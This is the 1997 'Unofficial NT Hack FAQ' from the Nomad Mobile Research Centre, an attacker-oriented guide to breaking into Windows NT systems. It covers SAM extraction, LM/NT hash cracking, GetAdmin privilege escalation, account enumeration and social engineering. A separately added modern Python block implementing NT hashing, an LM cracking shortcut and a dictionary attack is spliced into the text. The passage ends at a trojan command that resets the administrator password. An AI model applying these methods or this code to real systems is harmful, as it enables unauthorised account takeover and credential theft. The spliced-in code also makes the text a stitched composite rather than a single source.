---------------------------------------------------------------------------

From the Nomad Mobile Research Centre:

Frequently Asked Questions About Hacking Windows NT
"The Unofficial NT Hack FAQ"

October 25, 1997
Beta Version 2

Compiled by Simple Nomad

Notes about this release - I've added a Registry section, and as I "go to
press" so to speak, NT 5.0 looms on the horizon. I have not included
anything really web related; you can expect that in a future updated Web
Hack FAQ. If you are reading this and it is 1998, my guess is that it is
horribly out of date ;-) as things are really starting to happen with NT
and security at a fast pace. As always, your comments and additions are
welcome.

U means Updated, N means New

---------------------------------------------------------------------------
---------------------------------------------------------------------------

Contents

---------------------------------------------------------------------------

Section 00  General Info

   00-1. What is this "FAQ" for?
   00-2. What is the origin of this FAQ and how do I add to it?
   00-3. Is this FAQ available by anonymous FTP or WWW?
U  00-4. How was this FAQ prepared?

---------------------------------------------------------------------------

Section 01  Domains and Basic Security

   01-1. What are the components of NT security?
   01-2. How does the authentication of a user actually work?
   01-3. What is "standalone" vs. "workgroup" vs. "domain"?
U  01-4. What is a Service Pack?
N  01-5. What is a Hot Fix?
   01-6. What's with "C2 certification"?
   01-7. Are there any interesting default groups to be aware of?
   01-8. What are the default directory permissions?
   01-9. Are there any special restrictions surrounding the Administrative
         Tools group in Program Manager?

---------------------------------------------------------------------------

Section 02  Access to Accounts

   02-1. What are common accounts and passwords in NT?
   02-2. What if the Sys Admin has "renamed" the administrator account?
N  02-3. I lost the Administrator password. What do I do?

---------------------------------------------------------------------------

Section 03  Passwords

   03-1. How do I access the password file in NT?
   03-2. How do I crack NT passwords?
   03-3. What is a "brute force" password cracker?
   03-4. What is a "dictionary" password cracker?
   03-5. Which method is best for cracking?
   03-6. How does a Sys Admin enforce better passwords?
U  03-7. Can a Sys Admin prevent/stop SAM extraction?
N  03-8. How is password changing related to "last login time"?

---------------------------------------------------------------------------

Section 04  From The Console

   04-1. What does console access get me?
U  04-2. What about the file system?
   04-3. What is NetMon and why do I care?
   04-4. What can I do to get info from other computers from the console?
N  04-5. What is GetAdmin.exe?

---------------------------------------------------------------------------

Section 05  From the Network

   05-1. Should I even try for local administrator access?
U  05-2. I have guest remote access. How can I get administrator access?
U  05-3. What about %systemroot%\system32 being writeable?
   05-4. What if the permissions are restricted on the server?
   05-5. What exactly does the NetBios Auditing Tool do?
U  05-6. What is the "Red Button" bug?
U  05-7. What about forging DNS packets for subversive purposes?
   05-8. What about shares?
N  05-9. How do I get around a packet filter-based firewall?

---------------------------------------------------------------------------

Section 06  File and Directory Access

   06-1. How is file and directory security enforced?
   06-2. What is NTFS?
   06-3. Are there any vulnerabilities to NTFS and access controls?
   06-4. What is Samba and why is it important?
   06-5. I hack remotely. Once in, how can I do all that GUI stuff?

---------------------------------------------------------------------------

Section 07  Miscellaneous Info on NT

   07-1. How do I bypass the screen saver?
   07-2. What can sniffing get me?
U  07-3. How can I detect that a machine is in fact NT on the network?
   07-4. Can I do on-the-fly disk encryption on NT?
   07-5. Does the FTP service allow passive connections?
N  07-6. What is this "port scanning" you are talking about?
N  07-7. Does NT have bugs like Unix' sendmail?

---------------------------------------------------------------------------

Section 08  Denial of Service

   08-1. What is "Denial of Service"?
   08-2. What is the Ping of Death?
   08-3. What is a SYN Flood attack?
   08-4. What can telnet give me in the way of denial of service?
   08-5. What can I do with Samba?
   08-6. How do I lock out others from files?
   08-7. What's with ROLLBACK.EXE?
N  08-8. What is an OOB attack?
   08-9. Are there any other denial of service attacks?

---------------------------------------------------------------------------

Section 09  The Registry

N  09-1. What is the Registry?
N  09-2. What are hives?
N  09-3. Why is the Registry like this and why do I care?
N  09-4. What do I do with a copy of SAM?

---------------------------------------------------------------------------

Section 10  Resources

U  10-1. What are some NT WWW locations?
   10-2. What are some NT USENET groups?
U  10-3. What are some NT mailing lists?
   10-4. Where are some other NT FAQs?
U  10-5. Where can I get the files mentioned in this FAQ?
N  10-6. Where can I find Service Packs and Hot Fixes?

---------------------------------------------------------------------------

Section 11  Mathematical/Theoretical

   11-1. Can sessions be hijacked?
U  11-2. Are "man in the middle" attacks possible?
   11-3. What about TCP Sequence Number Prediction?

---------------------------------------------------------------------------

Section 12  For Administrators Only

   12-1. How do I secure my server?
   12-2. I'm an idiot. Exactly how do hackers get in?

---------------------------------------------------------------------------

Appendix Section

N  A-01. Source Code for an Audit Script
N  A-02. Perl Code for NETSCRIPT.PL
N  A-03. Source Code for NT LSA Exploit

---------------------------------------------------------------------------

Section 00  General Info

---------------------------------------------------------------------------

00-1. What is this "FAQ" for?

This FAQ serves two distinct purposes -- the first is to provide the NT
hacker with a resource. The second purpose is a wake-up call to Sys Admins
who are too lazy to install the latest Service Pack.

This FAQ assumes basic knowledge of NT. If you do not know the basics, go
buy a book or take one of those overpriced classes I get junk mail about.
Do not send me email asking me questions that can be answered with basic
knowledge -- I don't acknowledge them, I delete them.

---------------------------------------------------------------------------

00-2. What is the origin of this FAQ and how do I add to it?

This FAQ started for two reasons. First, several people asked if I was
going to do one. This seems reason enough, but the clincher was reading a
partial quote from the NT Security FAQ, which stated in the Legaleeze
section that the FAQ was not "a cookbook to be used by crackers to gain
access to Windows NT systems." Well, that's hardly fun, now is it! (BTW the
NT Security FAQ is still an excellent resource.) I've been collecting info
and reading about NT, but once I got to load up NT in my lab things really
got moving.

To add info to this FAQ, simply send an email to faq@nmrc.org with "NT" in
the subject. Please let me know what steps can duplicate an exploit, any
patches or workarounds that might fix it, whether Microsoft knows or cares
about it, and if you want to be credited in the FAQ. Anonymous submissions
are okay.
Encrypt them if you like, here's my PGP key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEQrjMAAAEEANaIf2AiInhVwmrZEFZ5V2eyZfuJfjoI9unJwRhokwJ4TtVh
ApEwjXVEbJBCPRKOHzibi5IEF2BirpzzlSy0Aj82yZk/iqYtJO60S0aycSPNPBl5
BmoLJaUjxakmnMMXOl3qdeWWtScpP7B4QTHyfsHRvQz0HSUPxh6RUqAiTzdxAAUR
tCRTaW1wbGUgTm9tYWQgPHRoZWdub21lQGZhc3RsYW5lLm5ldD4=
=v0Xj
-----END PGP PUBLIC KEY BLOCK-----

---------------------------------------------------------------------------

00-3. Is this FAQ available by anonymous FTP or WWW?

The FAQ is available as text or HTML from the following location:

   - http://www.nmrc.org/files/nt

Entire FAQ online:

   - http://www.nmrc.org/faqs/nt

---------------------------------------------------------------------------

00-4. How was this FAQ prepared?

After collecting information from a number of sources, I loaded NT Server
4.0 and performed a number of the techniques discussed in this FAQ. Most of
the tests involved Samba. Tests were conducted at the NMRC labs, on a
friend's network, and at a client's site (yes, they gave me permission).
The tests were not THAT scientific -- most involved duplicating the many
bugs that people have reported and playing with the various NT hacking
tools that are starting to appear. I've also tried to document some of the
major components that make up NT, especially if they are related to
security.

---------------------------------------------------------------------------
---------------------------------------------------------------------------

Section 01  Domains and Basic Security

---------------------------------------------------------------------------

01-1. What are the components of NT security?

There are several different components. Each has a role within the overall
NT security model. Because of the number and complexity of components in
the security model, each one deserves a look on its own, and so does the
way they work together.

Local Security Authority (LSA)
------------------------------

This is also known as the Security Subsystem. It is the central component
of NT security. It handles local security policy and user authentication.
LSA also handles generating and logging audit messages.

Security Account Manager (SAM)
------------------------------

SAM handles user and group accounts, and provides user authentication for
LSA.

Security Reference Monitor (SRM)
--------------------------------

SRM enforces access validation and auditing for LSA. It checks the user's
access as the user tries to access various files, directories, etc., and
either allows or denies access. Auditing messages are generated as a
result. The SRM contains a single copy of the access validation code to
ensure that resources are protected uniformly throughout the system,
regardless of resource type.

User Interface (UI)
-------------------

An important part of the security model, the UI is mainly all that the end
user sees, and is how most of the administration is performed.

---------------------------------------------------------------------------

01-2. How does the authentication of a user actually work?

First, a user logs on. When this happens, NT creates a token object that
represents that user (its SID, group SIDs and privileges). Each process the
user runs is associated with this token (or a copy of it). The
token-process combination is referred to as a subject. As subjects access
objects such as files and directories, NT checks the subject's token
against the Access Control List (ACL) of the object and determines whether
to allow the access or not. This may also generate an audit message.

---------------------------------------------------------------------------

01-3. What is "standalone" vs. "workgroup" vs. "domain"?

Each NT workstation participates in either a workgroup or a domain. Most
companies will have NT workstations participate in a domain so that the
administrator can manage the resources centrally.

A domain is one or more servers running NT Server that share a single
security database and are administered as a single system. The domain not
only contains servers, but NT workstations, Windows for Workgroups
machines, and even LAN Manager 2.x machines. The user and group database
covers ALL of the resources of a domain. Domains can be linked together via
trust relationships. The advantage of trusted domains is that a user only
needs one user account and password to get to resources across multiple
domains, and administrators can centrally manage the resources.

A workgroup is simply a grouping of workstations that do not belong to a
domain. A standalone NT workstation is a special case of a workgroup (a
workgroup of one).

User and group accounts are handled differently between domain and
workgroup situations. User accounts can be defined on a local or domain
level. A local user account can only log on to that local computer, while a
domain account can log on from any workstation in the domain.

Global group accounts are defined at a domain level. A global group account
is an easy way to grant access for a subset of users in a domain to, say, a
single directory or file located on a particular server within the domain.
Local group accounts are defined on each computer. A local group account
can have global group accounts and user accounts as members.

In a domain, the user and group database is "shared" by the servers
(domain controllers). NT workstations in the domain DO NOT hold a copy of
the domain's user and group database (each still has its own local SAM for
local accounts), but they authenticate against it. In a workgroup, each
computer in the workgroup has its own database, and does not share this
information.

---------------------------------------------------------------------------

01-4. What is a Service Pack?

Microsoft periodically bundles the accumulated fixes for an operating
system or application into a cumulative release called a Service Pack. NT
has its share, and the latest Service Pack normally contains the latest
fixes, including security patches.
Installing a Service Pack is NOT something to be taken lightly -- turning
some features on or off involves Registry editing, and installation can in
some circumstances disable things or cause conflicts. Often after a new
product has been loaded, even a Microsoft product, you must reinstall the
Service Pack because the product overwrote patched files with older ones.
For this reason, LAN administrators often neglect the timely installation
of Service Packs. For the hacker, this is a decided advantage -- especially
if the site has numerous NT servers and workstations in need of patching.
One day maybe Microsoft will make Service Pack installation a little less
painful, but until then you will find MANY locations will be either
under-patched or not patched at all.

Typically Service Packs are fairly well tested, although this is no
guarantee everything is "fixed". Admins should not place 100% of their
faith in them, but then hackers should not underestimate their value in
closing holes.

Service Pack locations are listed in Section 10-6.

---------------------------------------------------------------------------

01-5. What is a Hot Fix?

A Hot Fix is what is released between Service Pack releases. A Hot Fix is
generally released to address a specific problem or condition. Some Hot
Fixes have a particular Service Pack as a prerequisite, and they are
typically rolled into the next Service Pack.

Once again, some of the Hot Fixes are downright dangerous to monkey around
with, and many LAN folks will simply neglect installation, especially at
large NT shops. And once again this is good news for the hacker.

Hot Fixes are not as well tested as the Service Packs are -- often they are
released after headline-grabbing security flaws are announced, so they are
often rushed to press.

Hot Fix locations are listed in Section 10-6.

---------------------------------------------------------------------------

01-6. What's with "C2 certification"?

I'm not going to get into a bunch of detail on this. There are far better
places to go for the info, but I will state this -- running the c2config
utility to "lock down" your system will not protect you if you want to run
third party software, use the floppy drive, or connect to the network. It
is simply a marketing tactic used by Microsoft. The C2 tested
configuration had no network access and no floppy drive. Who wants to use
that?

I can see some value in running the c2config utility and then "opening up"
the system as needed to make it usable, but this is a lot of work and
beyond the scope of what I'm discussing here.

---------------------------------------------------------------------------

01-7. Are there any interesting default groups to be aware of?

There are a number of built-in local groups that can perform various
functions, some of which would be better off being left to the
Administrator. Administrators can do everything, but the following groups'
members can do a few extra items (I only verified this on 4.0):

   - Server Operators: do a shutdown, even remotely; reset the system
     time; perform backups and restores.
   - Backup Operators: do a shutdown; perform backups and restores.
   - Account Operators: do a shutdown.
   - Print Operators: do a shutdown.

Also members of these groups can log in at the console. As you explore
this FAQ and possibly someone else's server, remember these permissions.
Gaining a Server Operator account and placing a trojan that activates
after a remote shutdown could get you Administrator.

---------------------------------------------------------------------------

01-8. What are the default directory permissions?

Like 01-7, I only verified these on 4.0. And remember, Administrators are
deities. Otherwise, if it isn't here, the group doesn't have access.

\ (root), \SYSTEM32, \WIN32APP
   Server Operators and Everyone can read and execute files, display
   permissions on files, and do some changing of file attributes.

\SYSTEM32\CONFIG
   Everyone can list filenames in this directory.

\SYSTEM32\DRIVERS, \SYSTEM32\REPL
   Server Operators have full access, Everyone has read access.

\SYSTEM32\SPOOL
   Server Operators and Print Operators have full access, Everyone has
   read access.

\SYSTEM32\REPL\EXPORT
   Server Operators can read and execute files, display permissions on
   files, and do some changing of file attributes. Replicator has read
   access.

\SYSTEM32\REPL\IMPORT
   Server Operators and Replicator can read and execute files, display
   permissions on files, and do some changing of file attributes. Everyone
   has read access.

\USERS
   Account Operators can read, write, delete, and execute. Everyone can
   list filenames in this directory.

\USERS\DEFAULT
   Everyone has read, write, and execute.

---------------------------------------------------------------------------

01-9. Are there any special restrictions surrounding the Administrative
      Tools group in Program Manager?

The following tools have the following default group restrictions in 4.0:

Disk Administrator
   Must be a member of the Administrators group.

Event Log
   Anyone can run Event Viewer, but only members of the Administrators
   group can clear logs or view the Security Log.

Backup
   Anyone can back up a file they have normal access to, but only the
   Administrators and Backup Operators can override normal access.

User Manager
   Users and Power Users can create and manage local groups.

User Manager for Domains
   Users and Power Users can create and manage local groups if logged on
   at the server console, otherwise it is restricted to Administrators and
   Account Operators.

Server Manager
   Only Administrators, Domain Admins, and Server Operators can use this
   on domains they have an account on. Account Operators can only add new
   accounts to the domain. Some features in Server Manager can only be
   used by the Administrators and Domain Admins.
---------------------------------------------------------------------------

Section 02  Access to Accounts

---------------------------------------------------------------------------

02-1. What are common accounts and passwords in NT?

There are two accounts that come with NT out of the box -- Administrator
and Guest. In a network environment, I have run into the local
Administrator account left unpassworded, since the Sys Admin thought that
domain accounts ruled over local ones. Therefore it is possible to gain
initial access to an NT box by using its local Administrator account with
no password.

Guest is another common unpassworded account, although recent shipments of
NT disable the account by default. While it is possible that some
companies will delete the Guest account, some applications require it. If
Microsoft Internet Studio needs to access data on another system, it will
use Guest for that remote access.

---------------------------------------------------------------------------

02-2. What if the Sys Admin has "renamed" the administrator account?

It is possible that a Sys Admin will create a new account, give that
account the same access as an administrator, and then remove part of the
access to the Administrator account. The idea here is that if you don't
know the administrator account name, you can't get in as an administrator.

Typing "NBTSTAT -A ipaddress" will give you the new administrator account
name, assuming they are logged in: the name of the logged-on user shows up
in the NetBIOS name table as a UNIQUE <03> entry alongside the machine
name. A bit of social engineering could get them to log in as well.
nbtstat will also give you other useful information such as services
running (from the name suffixes), the NT domain name, the nodename, and
the ethernet hardware address.

See also section 05-6, which discusses a bug that allows you to get the
new administrator account name.

---------------------------------------------------------------------------

02-3. I lost the Administrator password. What do I do?

Use the Offline NT Password Editor by Petter Nordahl-Hagen. You need to
download Petter's code to your Linux machine (you DO have one of those,
don't you?) and compile it against a DES library and an MD4 library. Now
mount the NT drive read/write and follow the instructions in the readme.
The instructions are pretty easy to follow, especially if you know enough
to get to the point of using them ;-) Actually, to make things easier,
Petter has built a bootdisk image that steps you through the entire thing.

I'll be the first to admit that Petter's code is as dangerous as hell (it
writes directly into the SAM hive on disk), but it does work and I had no
problems. YMMV. Consider using GetAdmin.exe (section 04-5) and go from
there if you are too paranoid or fearful of booting up Linux to get to an
NT machine.

---------------------------------------------------------------------------

Section 03  Passwords

---------------------------------------------------------------------------

03-1. How do I access the password file in NT?

The location of what you need is %systemroot%\SYSTEM32\CONFIG\SAM
(\WINNT\SYSTEM32\CONFIG\SAM on a default install), which is the security
database. The default permissions (see 01-8) let Everyone list the
directory, but the file itself is held open by the system, so it cannot be
copied while NT is running. It is possible that there are SAM.SAV files
which could be readable. If so, these could be obtained for the purpose of
getting password info.

During the installation of NT a copy of the password database is put in
%systemroot%\REPAIR (as the compressed file SAM._; use EXPAND to
uncompress it). Since it was just installed, only the Administrator and
Guest accounts will be there, but maybe Administrator is enough --
especially if the Administrator password is not changed after
installation. If the Sys Admin updates their repair disks with RDISK /S,
or you get hold of a copy of the repair disks, you can get the current
password database.

If you are insane, you can go poking around in the SAM secret keys. First,
set the Schedule service to log on as LocalSystem and allow it to interact
with the desktop, and then use AT /INTERACTIVE to schedule a regedt32
session. The regedt32 session will be running as LocalSystem and you can
play around in the secret keys. However, if you change some stuff this
might be very bad. You have to be Administrator to do this, though, so for
the hacker you need to walk up to the machine while the Administrator is
logged in and distract them by telling them they're giving away Microsoft
t-shirts in the lobby (this doesn't always work ;-).

---------------------------------------------------------------------------

03-2. How do I crack NT passwords?

First off, it should be explained that the passwords are technically not
located on the server, or in the password database. What IS located there
is a one-way hash of the password. Let me explain...

Two one-way hashes are stored on the server -- a Lan Manager hash and a
Windows NT hash.

The Lan Manager hash works on a 14 byte password. The password is
converted to upper case, truncated or null-padded to 14 bytes, and split
into two 7 byte halves. Each 7 byte half is expanded into an 8 byte
odd-parity DES key, and each key is used to DES-encrypt the fixed "magic"
string KGS!@#$% (0x4B47532140232425). The two 8 byte results are
concatenated into a 16 byte one-way hash value. This value is the Lan
Manager "password". Note that there is no salt, and that the two halves
are completely independent of each other.

A regular Windows NT password hash is derived by converting the user's
password to Unicode and running it through MD4 to get a 16 byte value.
This hash value is the NT "password". Again there is no salt, so two users
with the same password have identical hashes.

So to crack NT passwords, the username and the corresponding one-way
hashes (Lan Man and NT) need to be extracted from the password database.
Instead of going out and writing some code to do this, simply get a copy of
Jeremy Allison's PWDUMP, which goes through SAM and gets the information
for you. PWDUMP does require that you are an Administrator to get stuff
out of the registry, but if you can get hold of copies of the security
database from another location (see Section 03-1) you can use those.
Obviously from this point you can use one of several cracking utilities to
perform either a brute force or dictionary attack on either the Lan Man or
NT hash. Several freeware products are available on the Internet. They
include:

Cracker           Author(s)            Compiles on...       Notes
----------------  -------------------  -------------------  -----------------------
c50a-nt-0.20.tgz  Bob Tinsley          Unix                 Dictionary cracker, a
                                                            port of Alec Muffett's
                                                            Crack 5.0 for Unix.
lc15exe.tgz       Mudge and Weld Pond  Unix, includes GUI   Best of the bunch, can
                  from the L0pht       NT version and DOS   do brute force very
                                       version              quickly, also can use
                                                            a dictionary.
NTCrack.tar.gz    Jonathan Wilkins     Unix, includes NT    Dictionary cracker, on
                                       version              its second revision.

---------------------------------------------------------------------------

03-3. What is a "brute force" password cracker?

A brute force cracker simply tries all possible passwords from legal
characters until it gets the password. From a cracker perspective, this is
usually very time consuming. L0phtcrack 1.5, a brute force cracker, makes
certain assumptions and reduces this time down considerably.

As pointed out in section 03-2, the Lan Manager password is null-padded to
14 bytes and split in half. The halves can be worked on individually. If
the password was originally only 7 characters or less, that second half is
always 0xAAD3B435B51404EE, which also tells you at a glance that the
password is short. To further ease brute force cracking, each half is only
seven characters long and the 8 byte DES key built from it carries just 56
bits of key material, so the keyspace per half is small. Also, since the
password is converted to upper case before hashing, Lan Manager password
cracking does not have to take into consideration the possibility of lower
case letters. L0phtcrack incorporates techniques to exploit all of these
possibilities. By cracking the Lan Manager password first, the NT password
can be brute forced just to determine the proper case of each alpha
character.
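To make the two hash formats and the LM shortcuts concrete, here is an added example in Python (it is not code from the FAQ or from any of the crackers listed above). It implements MD4 itself so it runs offline even where hashlib's md4 is disabled, and computes the NT hash; for the LM hash it shows the pre-processing (upper case, null padding, two independent 7-byte halves, 56-bit DES key expansion) and the fixed "empty second half" value quoted above, but it does not implement DES. The OEM code page (cp437) is an assumption, and the pwdump line at the bottom is constructed sample data using the textbook LM/NT hashes of the password "password". The case-recovery function shows why a cracked LM hash collapses the NT brute force to 2^n tries for n letters:

```python
# Added example: NT hash (MD4 over UTF-16LE), LM pre-processing, and the
# "crack LM first, then fix the case" shortcut. Not code from the FAQ.
import itertools
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: 3 rounds x 16 steps over 64-byte little-endian blocks."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate roles: A,B,C,D -> D,A,B,C
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: unsalted MD4 over the UTF-16LE (Unicode) password."""
    return md4(password.encode("utf-16-le"))


# DES_k("KGS!@#$%") with k built from seven null bytes: the second LM half
# of any password of 7 characters or fewer (value quoted in section 03-3).
LM_EMPTY_HALF = bytes.fromhex("AAD3B435B51404EE")


def lm_halves(password: str):
    """LM pre-processing: upper case, OEM bytes (cp437 assumed here),
    truncate/null-pad to 14 bytes, split into two independent 7-byte keys."""
    p = password.upper().encode("cp437", "replace")[:14].ljust(14, b"\x00")
    return p[:7], p[7:]


def des_key_from_half(half: bytes) -> bytes:
    """Spread the 56 key bits over 8 bytes; the low bit of each byte is odd
    parity, so only 56 of DES's 64 key bits ever vary."""
    bits = int.from_bytes(half, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F
        parity = 0 if bin(seven).count("1") % 2 else 1
        out.append((seven << 1) | parity)
    return bytes(out)


def lm_second_half_empty(lm_hash: bytes) -> bool:
    """True when the LM hash proves the password is 7 characters or fewer."""
    return lm_hash[8:] == LM_EMPTY_HALF


def recover_case(lm_plaintext: str, target_nt: bytes):
    """Given the upper-case plaintext recovered from the LM hash, find the
    real NT password by trying only case variants: 2^n tries for n letters."""
    choices = [(ch.lower(), ch.upper()) if ch.isalpha() else (ch,)
               for ch in lm_plaintext]
    for variant in itertools.product(*choices):
        cand = "".join(variant)
        if nt_hash(cand) == target_nt:
            return cand
    return None


def dictionary_attack(target_nt: bytes, wordlist):
    """Straight wordlist attack on an NT hash: hash each word, compare."""
    for word in wordlist:
        if nt_hash(word) == target_nt:
            return word
    return None


def parse_pwdump_line(line: str):
    """pwdump emits user:RID:lmhash:nthash::: (hashes as 32 hex digits)."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), bytes.fromhex(lm), bytes.fromhex(nt)


if __name__ == "__main__":
    # Constructed pwdump line: textbook LM/NT hashes of "password".
    line = ("Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:"
            "8846F7EAEE8FB117AD06BDD830B7586C:::")
    user, rid, lm, nt = parse_pwdump_line(line)
    print(user, rid, "<= 7 chars" if lm_second_half_empty(lm) else "8-14 chars")
    print("dictionary:", dictionary_attack(nt, ["admin", "password", "secret"]))
    print("case fix  :", recover_case("PASSWORD", nt))
```

The point of `recover_case` is the asymmetry the section describes: the LM half-hashes give you the password in upper case for a tiny per-half keyspace, after which the unsalted NT hash only has to be matched against case variants. `lm_second_half_empty` is the quick triage check a cracker (or an auditor) applies to a pwdump file before spending any CPU.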
Initital tests of L0phtcrack show its brute force capability to be quite admirable. A brute force of Administrator on the NMRC dedicated cracking machine took 7 days (some Unix passwords have be worked on for 3 weeks before being cracked). The NMRC dedicated cracking machine is running Slackware on a 486 DX50, so this is quite quite fast by NMRC standards. The latest version, L0phtCrack 1.5, is even faster. --------------------------------------------------------------------------- 03-4. What is a "dictionary" password cracker? All three of the password crackers listed in section 03-2 can do dictionary attacks. A dictionary attack is simply takes a list of dictionary words, and one at a time encrypts them using the same encryption algorithm NT uses to check and see if they encrypt to the same one way hash. If the hashes are equal, the password is considered cracked. The best of these dictionary crackers is the Crack 5.0 NT port, namely because of the strength of the mutation filters. These filters allow you to change "idiot" to "1d10t" and other advanced variations to get the most from a word list. Although L0phtcrack doesn't do the permutations like Crack, there are several ways you can "pre-treat" a word list, in particular you can use the DOS-based TPU. This utility does a number of filter operations, so with the right amount of creativity you can create a pretty substantial list. --------------------------------------------------------------------------- 03-5. Which method is best for cracking? Actually it depends on your resources and your needs. If you simply need to crack a password and there is no real time limit (just raw CPU to waste) then brute force is the way to go. If you need a password quickly, using a wordlist might shorten your time. In general, a swipe with a couple of decent word lists will get some, permutations can get a few more, and the rest can be simply brute forced. Watch what the cracked passwords are. 
If you can spot a pattern, such as all lower case with 2 numbers at least six characters long, this may give you some clues for what to feed your brute forcer. --------------------------------------------------------------------------- 03-6. How does a Sys Admin enforce better passwords? There are several freeware utilities that allow for password changing with rules enforced. These range from the simple passwd utility by Alex Frink to Microsoft's own utilities. The NT Server 4.0 Resource Kit has a utility called Passprop that enforces random passwords. Also on Service Pack 2 is a DLL called PASSFILT that will does basically the same thing. --------------------------------------------------------------------------- 03-7. Can an Sys Admin prevent/stop SAM extraction? As long as you can get in as Administrator, you are basically vulnerable. Microsoft has gradually increased its security for the SAM files and the hashes, but as things like L0phtCrack are quickly improved and Microsoft insists on backward compatibility with LAN Manager-style logins, things will be vulnerable. In fact, the latest L0phtCrack can take input from stored sniffer traces to use as the source for its password cracking. So for you sys admins out there, keep absolutely current of Service Packs and Hot Fixes. For you hackers out there, well, it's a big bright world ;-) --------------------------------------------------------------------------- 03-8. How is password changing related to "last login time"? Let's say an admin is checking the last time certain users have logged in by doing a NET USER /DOMAIN. Is the info accurate? Most of the time it will NOT be. Most users do not login directly to the Primary Domain Controller (PDC), they login to a Backup Domain Controller (BDC). BDCs do NOT contain readonly versions of SAM, they contain read-write versions. 
To keep the already ungodly amount of network traffic down, BDCs do not tell the PDC that they have an update of the last login time until a password change has been done. And the NET USER /DOMAIN command checks the PDC, so last login time returned from this command could be wildly off (it could even show NEVER). As a hacker, if you happen to know that password aging is not enforced, then you can bet that last login times will probably not be very accurate. --------------------------------------------------------------------------- Section 04 From The Console --------------------------------------------------------------------------- 04-1. What does console access get me? There are a few advantages to having direct console access. First off, try the hacks listed in sections 05-1, 05-2, and 05-3. 05-3 especially may not work across a network if the administrator is not allowed to login except at the console. And a brute force attack from the console will run a lot quicker than across the network anyway. --------------------------------------------------------------------------- 04-2. What about the file system? Obviously gaining access to the file system from the console is much easier than across a network, especially if the Sys Admin is trying to keep you out. Try booting up the system from an MS-DOS diskette, and running NTFSDOS.EXE to access the NTFS file system. Currently this software is read only, so it is only good for getting copies of existing data. Linux is another OS that will read NTFS file system, but "simply loading Linux" on a "spare partition" is usually impractical, and hardly simple if you are not familiar with it. See section 02-3 for an easier Linux method. --------------------------------------------------------------------------- 04-3. What is NetMon and why do I care? NetMon is Microsoft's Network Monitor. 
It is a sniffer that runs under NT, and being a sniffer, if you have to ask why you care, well, never mind ;-) NetMon is protected by a password scheme on version 3.51 that has nothing to do with regular NT security. In Phrack 48 file 15, AON and daemon9 have not only cracked the encryption scheme, they have written exploits for it as well. Check Section 10-6 for the location of the exploit code (it includes full source, including a Unix version in case you do not have an NT compiler). By the way, compared to other commercial sniffers, NetMon sucks.

---------------------------------------------------------------------------

04-4. What can I do to get info from other computers from the console?

If the console you have stumbled on is a domain controller (or you have simply hooked one up), try these steps to get a list of accounts on the target machine:

1. From the USER MANAGER, create a trusting relationship with the target.
2. Enter whatever when asked for a password. Don't fret when it doesn't work. The target is now on your trusting list.
3. Launch NT Explorer and right click on any folder.
4. Select SHARING.
5. From the SHARED window, select ADD.
6. From the ADD menu, select your target NT server.
7. You will now see the entire group listing of the target.
8. Select SHOW USERS and you will see the entire user listing, including full names and descriptions.

This gives you a list of user accounts to target for individual attack. By studying the group memberships, you can even make decisions about who will have more privileges than others.

---------------------------------------------------------------------------

04-5. What is GetAdmin.exe?

GetAdmin.exe is a program written by Konstantin Sobolev. It exploits a subfunction in NtAddAtom that does not check the address of the output. By altering where the output can be written to, GetAdmin adds a user to the Administrators group. It works on NT 4.0.
The easiest way to use it is to simply copy it to \TEMP (along with its DLL, GASYS.DLL) and run it like so: GETADMIN GUEST (or whatever account you wish to add). This will add Guest to the Administrators group. GetAdmin will add domain accounts on a primary domain controller and even other domain accounts. Since it is a command line tool, it will work across a telnet session. There is a post-SP3 Hot Fix available from Microsoft that defeats this if loaded.

It is possible that some type of filtering might be in place to prevent uploading or downloading of files. To circumvent this, try renaming the executable with some other extension. For example, START GETADMIN.XXX GUEST will work fine if EXEs are a problem.

---------------------------------------------------------------------------

Section 05 From the Network

---------------------------------------------------------------------------

05-1. Should I even try for local administrator access?

Oh yes. A lot of NT administrators do not understand that when an NT box joins a domain, if they left that administrator password blank, it doesn't get "filled in" or "overwritten". Belonging to a domain does NOT turn off local users. If you get local administrator, check out the exploit code in section 05-3 to get more access elsewhere.

If you gain local administrator, try some of these tricks (these will work with the default settings after installation on the target):

- NBTSTAT -A x.x.x.x (plug in the IP address of the box you're after)
- Add the machine name this returns to your LMHOSTS file.
- If you are not on an NT 4.x machine, type NBTSTAT -R to refresh the NetBios names.
- Try NET VIEW \\machinename to see the shares
- Try DIR \\machinename\share to list shares if open
- Try NET VIEW \\ipaddress or NET VIEW \\fully.qualified.name.com, which should get you the user names under NT 4.0.

---------------------------------------------------------------------------

05-2. I have guest remote access. How can I get administrator access?

Basic NT 3.51 has some stuff read/writable by default. You could edit the association between an application and the data file extension using regedt32. First off, you should write a Win32 app that does nothing but the following -

net user administrator biteme /y
notepad %1 %2 %3 %4 %5

